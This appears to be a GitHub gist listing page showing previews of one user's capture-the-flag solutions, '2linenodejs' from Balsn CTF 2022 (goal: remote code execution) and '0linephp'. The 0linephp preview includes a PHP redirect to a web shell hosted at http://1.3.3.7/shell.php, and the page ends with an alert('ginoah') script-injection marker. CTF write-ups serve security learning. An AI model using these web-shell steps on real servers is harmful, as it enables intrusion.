Skip to content

Instantly share code, notes, and snippets.

View ginoah's full-sized avatar

Ginoah ginoah

View GitHub Profile
@ginoah
ginoah / 2linenodejs.md
Created September 12, 2022 06:30
Solution for 2linenodejs

Balsn CTF 2022 - 2linenodejs

Challenge

Goal

RCE

Environment Setup

@ginoah
ginoah / 0linephp.md
Created January 1, 2022 06:29
Solution for 0linephp

0linephp

Web shell

Host an simple web server that will redirect / to shell.php

index.php

<?php
 header('Location: http://1.3.3.7/shell.php');
alert('ginoah')